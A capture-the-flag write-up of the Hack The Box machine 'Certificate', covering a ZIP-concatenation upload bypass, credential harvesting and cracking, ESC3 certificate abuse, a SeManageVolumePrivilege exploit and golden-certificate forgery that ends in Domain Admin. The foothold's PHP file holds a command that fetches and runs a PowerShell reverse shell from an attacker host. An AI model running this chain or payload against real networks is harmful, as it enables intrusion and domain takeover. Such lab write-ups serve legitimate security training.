HTB - Certificate

Description


This machine showcases a multi-stage attack path beginning with remote code execution achieved through ZIP file concatenation, embedding both a PDF and a malicious PHP shell. Post-exploitation, database credentials are harvested to pivot to a second user, followed by lateral movement to a third user. The third account has certificate enrollment privileges, allowing the attacker to exploit ESC3 and escalate to a fourth user. This final user, through Active Directory group membership, holds SeManageVolumePrivilege, which is abused to export the CA's private key. A forged golden certificate is then used to impersonate high-privileged users, ultimately leading to Domain Admin compromise.

Enumeration


I started with a normal Nmap scan to find all open ports:

Nmap Scan

nmap -p- --min-rate 10000 $target -Pn -oN Nmap/allports

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws

I exported all open ports to a variable and ran the script and version detection scans:

export ports="$(cat Nmap/allports | grep '^[0-9]' | cut -d/ -f1 | tr "\n" "," | sed 's/,$//g')"

nmap -p"$ports" $target -Pn -sC -sV -oN Nmap/script-scan

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-01 06:23:50Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T06:25:22+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T06:25:23+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T06:25:22+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T06:25:23+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing

Summary

* Open ports: 53,80,88,135,139,389,445,593,636,3268,3269,5985,9389
* Services: DNS, HTTP (Apache/XAMPP, not IIS), Kerberos, RPC, SMB, LDAP, LDAPS, Global Catalog, WinRM, ADWS
* Important notes: Domain: certificate.htb - http://certificate.htb/ (port 80 redirects there); the DC's clock is about 8 hours ahead of the scanner

I always update /etc/hosts before I attack the domain to avoid any tooling issues

echo "$target dc01 dc01.certificate.htb certificate.htb" | sudo tee -a /etc/hosts

10.10.11.71 dc01 dc01.certificate.htb certificate.htb

I started with web server enumeration. Visiting http://certificate.htb/ gives this web page:

There were not many pages on the site: only the /register, /login, /blog, contacts.php, index.php and about.php endpoints.

I wanted to log into the site, but I had to register for an account first:

Here is the successful registration message

Then, I went to log in to the site with my username & password

I landed here after logging in and saw a new endpoint, /courses.php:

http://certificate.htb/courses.php

I clicked on the first course and then Enroll button:

This message appeared after I clicked the Enroll button, along with the following section:

The Watch button did nothing, but Submit took me to another page:

The upload form only accepts .zip, .pdf and .xlsx files.

Foothold


After testing the upload with my team, we got RCE using the following technique:

The archive contents had to be a .pdf, so I created one zip containing a .pdf and another containing a .php reverse shell. A concatenated ZIP carries two central directories: a parser that walks local file headers from the start of the file sees the first archive (the .pdf), while one that locates the end-of-central-directory record at the end of the file sees the second (the .php). The check that only allowed the .pdf and the step that extracted the archive evidently used different strategies, which is what made this work.

zip test1.zip file.pdf 
zip test2.zip rev.php

Reverse shell content:

cat rev.php

<?php
// fetch and run a PowerShell reverse shell from the attacker host (10.10.16.14)
shell_exec("powershell -nop -w hidden -c iex(iwr 10.10.16.14/shell.ps1 -UseBasicParsing)");
?>

Replace shell.ps1 with the PowerShell reverse shell of your choice; 10.10.16.14 is the attacker host.

Then concatenated the two zip files into one:

cat test1.zip test2.zip > combined.zip

The site gave me a direct link to the extracted .pdf file.

Instead of file.pdf, I requested rev.php from the same location, which executed the PHP and gave me a reverse shell.
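To make the mechanism concrete, here is an added example (my own code, not part of the original write-up or of the target application) that builds the two archives in memory, concatenates them the way `cat` does, and shows what each parsing strategy sees. It also includes the server-side check that rejects such uploads. The file contents are constructed placeholders; the real rev.php from above is not embedded.

```python
"""Added example (not from the original write-up): why two concatenated ZIPs
are seen differently by different parsers, plus an upload check that rejects
them. Everything here is constructed in memory."""
from __future__ import annotations
import io
import struct
import zipfile

LOCAL_HDR = b"PK\x03\x04"   # local file header signature
EOCD_SIG = b"PK\x05\x06"    # end-of-central-directory signature


def make_zip(name: str, data: bytes) -> bytes:
    """Build a single-entry ZIP in memory (stored, so sizes are deterministic)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        z.writestr(name, data)
    return buf.getvalue()


def concat_zips(*parts: bytes) -> bytes:
    """Equivalent of `cat test1.zip test2.zip > combined.zip`."""
    return b"".join(parts)


def local_header_names(blob: bytes) -> list[str]:
    """Walk local file headers from the start of the file, the way a
    forward-scanning validator would, and return every entry name met."""
    names = []
    pos = blob.find(LOCAL_HDR)
    while pos >= 0:
        # 30-byte fixed header: sig, version, flags, method, time, date, crc,
        # compressed size, uncompressed size, name length, extra length
        (_sig, _ver, _flags, _method, _time, _date, _crc,
         csize, _usize, fnlen, extralen) = struct.unpack_from("<4sHHHHHLLLHH", blob, pos)
        names.append(blob[pos + 30:pos + 30 + fnlen].decode())
        # skip name, extra field and file data; the next hit (if any) is the
        # first entry of an appended archive, past this archive's central directory
        pos = blob.find(LOCAL_HDR, pos + 30 + fnlen + extralen + csize)
    return names


def central_directory_names(blob: bytes) -> list[str]:
    """What an EOCD-based parser (Python's zipfile, most extractors) sees: it
    locates the *last* end-of-central-directory record, so the appended
    archive wins."""
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        return z.namelist()


def is_concatenated(blob: bytes) -> bool:
    """Upload check: reject archives that carry more than one EOCD record or
    whose forward scan and central directory disagree about the entries."""
    forward = local_header_names(blob)
    central = central_directory_names(blob)
    return blob.count(EOCD_SIG) != 1 or sorted(forward) != sorted(central)


if __name__ == "__main__":
    # constructed sample contents; no real shell here
    pdf_zip = make_zip("file.pdf", b"%PDF-1.4\n% constructed placeholder\n")
    php_zip = make_zip("rev.php", b"<?php echo 'constructed placeholder'; ?>\n")
    combined = concat_zips(pdf_zip, php_zip)
    print("forward scan :", local_header_names(combined))      # ['file.pdf', 'rev.php']
    print("central dir  :", central_directory_names(combined))  # ['rev.php']
    print("reject upload:", is_concatenated(combined))          # True
```

Python's zipfile searches backwards for the end-of-central-directory record, so on the combined file namelist() returns only rev.php and read('rev.php') works, while a validator that walks local headers from offset 0 meets file.pdf first. A server that validates with one strategy and extracts with the other is exactly the setup this upload abused; comparing both views, or refusing archives with more than one EOCD record, closes it.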

Lateral Movement


Shell as Sara.b

Under C:\xampp\htdocs\certificate.htb, I found db.php, which contains the database connection credentials.

I confirmed that a MySQL server was running on the host.

Rather than uploading Chisel and setting up reverse port forwarding, I looked for the mysql.exe client on the box and found it under C:\xampp\mysql\bin, so I could query the database locally:

C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p'REDACTED' -D certificate_webapp_db -e 'show tables;'
C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p'REDACTED' -D certificate_webapp_db -e 'SELECT * FROM users;'

I found two users with an @certificate.htb email address in the table, which suggested they were domain users; I could confirm that Sara.B is one.

The hash for Sara was cracked successfully

hashcat -m 3200 hash.bcrypt /usr/share/wordlists/rockyou.txt

$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.xxxxx.xxxxxxxxxxx:REDACTED

Confirm access

nxc ldap $target -u Sara.b -p REDACTED

LDAP        10.10.11.71     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)
LDAP        10.10.11.71     389    DC01             [+] certificate.htb\Sara.b:########

With Sara credentials, I used bloodhound.py to collect domain LDAP data:

bloodhound-python -u $user -p $password -ns $target -d $domain -c all --dns-timeout 120 --zip

I also checked SMB share access, but found nothing useful.

In the BloodHound GUI I found that Sara is a member of the privileged Account Operators group, among others. With that membership I could take over almost any account, except those protected from Account Operators such as members of Administrators.

This path was later patched by the HTB team, so you will no longer see the Account Operators membership. It allowed going directly from Sara.B to Lion.SK or Ryan.K.

Also, members of Help Desk can access the box via WinRM.

Three users other than xamppuser and Sara have a Desktop folder on the box.

Lion.SK is a member of Domain CRA Managers

BloodHound described that group:

Also, Ryan is a member of Domain Storage Managers

BloodHound described that group:

My strategy was to compromise either of the two users, since each could lead to high privileges: on the CA as Lion, or at the file-system level as Ryan.

First, I accessed the box via WinRM as Sara:

evil-winrm -i $target -u $user -p $password

Shell as Lion.SK

Then I found these files in the Documents folder:

Download both files

*Evil-WinRM* PS C:\Users\Sara.B\Documents\ws-01> download WS-01_PktMon.pcap

Info: Downloading C:\Users\Sara.B\Documents\ws-01\WS-01_PktMon.pcap to WS-01_PktMon.pcap

Info: Download successful!
*Evil-WinRM* PS C:\Users\Sara.B\Documents\ws-01> download Description.txt

Info: Downloading C:\Users\Sara.B\Documents\ws-01\Description.txt to Description.txt

When I opened the .pcap file in Wireshark, I saw a lot of TCP traffic, so I filtered it out, and several KRB5 packets appeared.

If I could extract a complete pre-authentication exchange, I might be able to get a crackable hash.

When I searched for a way to extract the hashes from the .pcap, I found this repo:

I cloned it to my Kali box and ran the parser over the capture for each message type:

git clone https://github.com/jalvarezz13/Krb5RoastParser.git

python3 krb5_roast_parser.py WS-01_PktMon.pcap as_req > hash1
python3 krb5_roast_parser.py WS-01_PktMon.pcap as_rep > hash2
python3 krb5_roast_parser.py WS-01_PktMon.pcap tgs_rep > hash3

The first hash carried the realm exactly as the client sent it, CERTIFICATE, instead of the full realm CERTIFICATE.HTB. Hashcat derives the AES salt from the realm and username fields of the hash, so the realm had to be changed to CERTIFICATE.HTB before cracking:

hashcat -m 19900 hash1 /usr/share/wordlists/rockyou.txt 

..snip..
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:REDACTED

Session..........: hashcat
Status...........: Cracked
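As an added example (my own code, not from the write-up or from Krb5RoastParser), here is a minimal DER walker that pulls the PA-ENC-TIMESTAMP out of an AS-REQ and builds the hashcat line, together with the realm fix described above. The AS-REQ bytes and the KDC salt string are constructed inside the block, not taken from the capture; the dict keys and function names are my own.

```python
"""Added example (not from the write-up or Krb5RoastParser): a minimal DER
walker that extracts the PA-ENC-TIMESTAMP from a Kerberos AS-REQ and builds
the hashcat 19900 ($krb5pa$18$) line. The AS-REQ is constructed here, not
captured; the KDC salt value is likewise a constructed stand-in."""
from __future__ import annotations

# ---- tiny DER encoder, only used to construct the sample AS-REQ ----------
def der(tag: int, body: bytes) -> bytes:
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    elif n < 0x100:
        length = b"\x81" + bytes([n])
    else:
        length = b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + length + body

def ctx(n: int, body: bytes) -> bytes:     # context-specific constructed [n]
    return der(0xA0 | n, body)

def seq(*parts: bytes) -> bytes:
    return der(0x30, b"".join(parts))

def integer(v: int) -> bytes:              # small non-negative ints only
    return der(0x02, bytes([v]))

def gstring(s: str) -> bytes:              # KerberosString is a GeneralString
    return der(0x1B, s.encode())

def build_as_req(user: str, client_realm: str, etype: int, cipher: bytes) -> bytes:
    """AS-REQ ([APPLICATION 10]) with one PA-DATA of type 2 (PA-ENC-TIMESTAMP)."""
    enc_ts = seq(ctx(0, integer(etype)), ctx(2, der(0x04, cipher)))        # EncryptedData
    pa_data = seq(ctx(1, integer(2)), ctx(2, der(0x04, enc_ts)))            # PA-DATA
    cname = seq(ctx(0, integer(1)), ctx(1, seq(gstring(user))))            # NT-PRINCIPAL
    body = seq(ctx(0, der(0x03, b"\x00\x40\x81\x00\x10")),                 # kdc-options
               ctx(1, cname), ctx(2, gstring(client_realm)),
               ctx(8, seq(integer(etype))))                                # etype list
    return der(0x6A, seq(ctx(1, integer(5)), ctx(2, integer(10)),
                         ctx(3, seq(pa_data)), ctx(4, body)))

# ---- tiny DER decoder, the part a pcap parser actually needs --------------
def tlv(buf: bytes, pos: int = 0) -> tuple[int, bytes, int]:
    """Return (tag, value, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length

def elements(body: bytes) -> list[tuple[int, bytes]]:
    out, pos = [], 0
    while pos < len(body):
        tag, value, pos = tlv(body, pos)
        out.append((tag, value))
    return out

def inner(element: bytes) -> bytes:        # value of the single TLV in `element`
    return tlv(element)[1]

def parse_as_req(raw: bytes) -> dict:
    tag, app, _ = tlv(raw)
    if tag != 0x6A:
        raise ValueError("not an AS-REQ")
    top = dict(elements(inner(app)))       # [1] pvno [2] msg-type [3] padata [4] req-body
    body = dict(elements(inner(top[0xA4])))
    cname = dict(elements(inner(body[0xA1])))
    result = {"user": inner(inner(cname[0xA1])).decode(),   # first name-string component
              "client_realm": inner(body[0xA2]).decode()}
    for _tag, pa_body in elements(inner(top[0xA3])):
        pa = dict(elements(pa_body))
        if int.from_bytes(inner(pa[0xA1]), "big") == 2:      # PA-ENC-TIMESTAMP
            enc = dict(elements(inner(inner(pa[0xA2]))))
            result["etype"] = int.from_bytes(inner(enc[0xA0]), "big")
            result["cipher"] = inner(enc[0xA2])
    return result

def krb5pa_line(user: str, realm: str, etype: int, cipher: bytes) -> str:
    """hashcat format for AES pre-auth: -m 19900 (etype 18), -m 19800 (etype 17)."""
    return f"$krb5pa${etype}${user}${realm}${cipher.hex()}"

def realm_from_salt(salt: str, user: str) -> str:
    """AES string-to-key salts are REALM + principal; hashcat rebuilds that salt
    from the realm and user fields, so the realm must be the one the KDC used.
    Take it from the ETYPE-INFO2 salt in the KRB-ERROR/AS-REP, not from the client."""
    if not salt.endswith(user):
        raise ValueError("salt does not end with the principal name")
    return salt[:-len(user)]

if __name__ == "__main__":
    raw = build_as_req("Lion.SK", "CERTIFICATE", 18, bytes(range(56)))   # constructed
    req = parse_as_req(raw)
    print(krb5pa_line(req["user"], req["client_realm"], req["etype"], req["cipher"]))
    kdc_salt = "CERTIFICATE.HTBLion.SK"                                     # constructed
    print(krb5pa_line(req["user"], realm_from_salt(kdc_salt, req["user"]),
                      req["etype"], req["cipher"]))
```

The second printed line is the one to feed hashcat: the client may name its realm any way it likes (here the NetBIOS-style CERTIFICATE), but the key it encrypted the timestamp with was derived from the salt the KDC announced, so that is the realm the hash must carry.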

Shell as Ryan.K

As a member of Domain CRA Managers, I enumerated the certificate templates as Lion.SK and found one vulnerable to ESC3:

certipy find -u Lion.SK@certificate.htb -p REDACTED -enabled -vulnerable -stdout

..snip..
Template Name                       : Delegated-CRA
Display Name                        : Delegated-CRA

[+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
[!] Vulnerabilities
ESC3                  : Template has Certificate Request Agent EKU set.

ESC3 vulnerabilities exploit weaknesses related to Certificate Request Agents, also known as Enrollment Agents. An Enrollment Agent is an account authorized to request certificates on behalf of other users. This functionality is legitimate in scenarios such as helpdesk staff enrolling smart cards for users or for automated certificate provisioning systems. However, if an attacker gains access to an active Enrollment Agent certificate, or if they can enroll for a new Enrollment Agent certificate due to misconfigured template permissions, they can abuse this privilege to obtain certificates for other users, including highly privileged accounts like Domain Administrators.

I followed the Certipy wiki to perform the attack.

First, request an enrollment agent certificate for Lion.SK from the Delegated-CRA template:

certipy req -u Lion.SK@certificate.htb -p $password -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'

Requesting a certificate on behalf of Administrator then failed with CERTSRV_E_UNSUPPORTED_CERT_TYPE:

certipy req -u Lion.SK@certificate.htb -p $password -ca 'Certificate-LTD-CA' -template 'User' -on-behalf-of 'certificate\administrator' -pfx lion.sk.pfx

A quick search for this error showed that the requested template (User) was not published by the CA, so I used Certipy to list all enabled templates on the CA: User was not there, but SignedUser was.

I modified the command and ran it again, but it still failed for the Administrator account, this time with CERTSRV_E_SUBJECT_EMAIL_REQUIRED: the template builds the subject from the account's email address, and Administrator has none. When I changed the requested user to Ryan.K it worked:

certipy req -u Lion.SK@certificate.htb -p $password -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of 'certificate\ryan.k' -pfx lion.sk.pfx

Authenticate as Ryan with the issued certificate and get his NT hash:

certipy auth -pfx ryan.k.pfx -domain certificate.htb -dc-ip $target

I got a shell as Ryan.K and found that he holds SeManageVolumePrivilege, which makes sense for a member of Domain Storage Managers:

evil-winrm -i $target -u ryan.K -H REDACTED

I searched GitHub for ways to abuse this privilege and found two repos; the second one ships a compiled exploit, so I used it.

What the exploit does:

  • It grants full permission on the C:\ drive to all users on the machine:

    • Enables SeManageVolumePrivilege in the token

    • Opens a handle to \\.\C: with SYNCHRONIZE | FILE_TRAVERSE

    • Sends FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 (BUILTIN\Administrators) with S-1-5-32-545 (BUILTIN\Users) in the volume's security descriptors

The repo author suggests dropping a malicious DLL under C:\Windows\System32\spool\drivers\x64\3 and running specific commands to trigger it and get SYSTEM. However, that path does not even exist on this box.
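To show what that SID replacement does at the ACE level, here is an added example (my own code, not from the write-up or from the exploit repository). It builds a self-relative security descriptor for a constructed file, applies the same Administrators-to-Users substitution that the FSCTL performs, and flags the resulting BUILTIN\Users full-control entry, which is also the indicator a defender would look for with icacls after such an exploit. The descriptor, access masks and function names are assumptions for the demo; the real FSCTL does this to every descriptor on the volume.

```python
"""Added example (not from the write-up or the SeManageVolumeExploit repo):
models what FSCTL_SD_GLOBAL_CHANGE's machine-SID replacement does to an NTFS
security descriptor, on a constructed self-relative descriptor with one DACL.
The real FSCTL rewrites every descriptor on the volume; the per-ACE effect is
what is shown here: Administrators' access becomes Users' access."""
from __future__ import annotations
import struct

ADMINISTRATORS = "S-1-5-32-544"      # BUILTIN\Administrators
USERS = "S-1-5-32-545"               # BUILTIN\Users
FILE_ALL_ACCESS = 0x001F01FF
FILE_READ_EXECUTE = 0x001200A9       # FILE_GENERIC_READ | FILE_GENERIC_EXECUTE
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0


def sid_to_bytes(sid: str) -> bytes:
    parts = sid.split("-")                                   # ['S', rev, authority, sub...]
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError(sid)
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + b"".join(s.to_bytes(4, "little") for s in subs))


def sid_from_bytes(buf: bytes, pos: int = 0) -> tuple[str, int]:
    rev, count = buf[pos], buf[pos + 1]
    authority = int.from_bytes(buf[pos + 2:pos + 8], "big")
    subs = struct.unpack_from(f"<{count}L", buf, pos + 8)
    return f"S-{rev}-{authority}-" + "-".join(map(str, subs)), pos + 8 + 4 * count


def build_sd(aces: list[tuple[str, int]]) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR holding only a DACL of allow ACEs."""
    ace_blobs = []
    for sid, mask in aces:
        sid_b = sid_to_bytes(sid)
        # ACE_HEADER (type, flags, size) + ACCESS_MASK + SID
        ace_blobs.append(struct.pack("<BBHL", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), mask) + sid_b)
    body = b"".join(ace_blobs)
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(body), len(ace_blobs), 0) + body   # ACL header
    # SD header: revision, sbz1, control, owner/group/sacl/dacl offsets (DACL right after the 20-byte header)
    header = struct.pack("<BBHLLLL", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


def dacl_entries(sd: bytes) -> list[tuple[str, int]]:
    """(sid, access mask) for every ACCESS_ALLOWED ACE in the DACL."""
    dacl_off = struct.unpack_from("<BBHLLLL", sd, 0)[6]
    count = struct.unpack_from("<BBHHH", sd, dacl_off)[3]
    pos, out = dacl_off + 8, []
    for _ in range(count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHL", sd, pos)
        sid, _ = sid_from_bytes(sd, pos + 8)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            out.append((sid, mask))
        pos += ace_size
    return out


def change_machine_sid(sd: bytes, current: str, new: str) -> bytes:
    """Model of SD_GLOBAL_CHANGE_TYPE_MACHINE_SID: every SID equal to `current`
    is rewritten to `new` in place. The exploit hands the driver Administrators
    as the 'old machine SID' and Users as the 'new' one."""
    cur_b, new_b = sid_to_bytes(current), sid_to_bytes(new)
    if len(cur_b) != len(new_b):
        raise ValueError("replacement SID must keep ACE sizes unchanged")
    return sd.replace(cur_b, new_b)


def users_have_full_control(sd: bytes) -> bool:
    """Post-exploitation indicator (icacls shows it as BUILTIN\\Users:(F))."""
    return any(sid == USERS and (mask & FILE_ALL_ACCESS) == FILE_ALL_ACCESS
               for sid, mask in dacl_entries(sd))


if __name__ == "__main__":
    before = build_sd([(ADMINISTRATORS, FILE_ALL_ACCESS), (USERS, FILE_READ_EXECUTE)])  # constructed
    after = change_machine_sid(before, ADMINISTRATORS, USERS)
    print("before:", dacl_entries(before))
    print("after :", dacl_entries(after))
    print("Users full control:", users_have_full_control(before), "->", users_have_full_control(after))
```

Because the substitution is a SID-for-SID rewrite, nothing else in the descriptor changes: the ACE count, sizes and masks stay the same, which is why an "Entries changed: N" style result is all the exploit can report. Auditing the root of the volume for a BUILTIN\Users entry carrying a mask that only Administrators should hold is the cheap way to spot it afterwards.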

Privilege Escalation


  • Alternatively, with full read permission on C:\ I could try to read sensitive files such as:

    • the SAM, SYSTEM and SECURITY hives

    • the NTDS.DIT database

    • the root CA private key

In practice, I got no access to any of them except the root CA private key.

Here are the steps I followed to get the private key:


  1. Download the exploit and upload it to the box.

  2. Run the exploit to get full permission on C:\:

*Evil-WinRM* PS C:\Users\Ryan.K\Documents> .\SeManageVolumeExploit.exe
Entries changed: 844

DONE

  3. Export the CA private key with certutil:

certutil -exportPFX "Certificate-LTD-CA" C:\programdata\ca.pfx

With the CA private key, I can forge a golden certificate for any principal and authenticate as Administrator.

I used this link as a reference:

Certificate authority | The Hacker Recipes

The Nmap output showed the DC's clock about 8 hours ahead of mine; to avoid Kerberos clock-skew errors, I synced my clock to the DC first:

sudo timedatectl set-ntp off; sudo rdate -n dc01

certipy forge -ca-pfx "ca.pfx" -upn "administrator@certificate.htb" -subject "CN=Administrator,CN=Users,DC=CERTIFICATE,DC=HTB"

certipy auth -pfx administrator_forged.pfx -username 'administrator' -domain 'certificate.htb' -dc-ip $target

Get the root flag

nxc smb $target -u Administrator -H REDACTED -x 'type C:\Users\Administrator\Desktop\root.txt'

Root Flag: 19f55bf4156dxxxxxxxxxxxxxxxxxxx
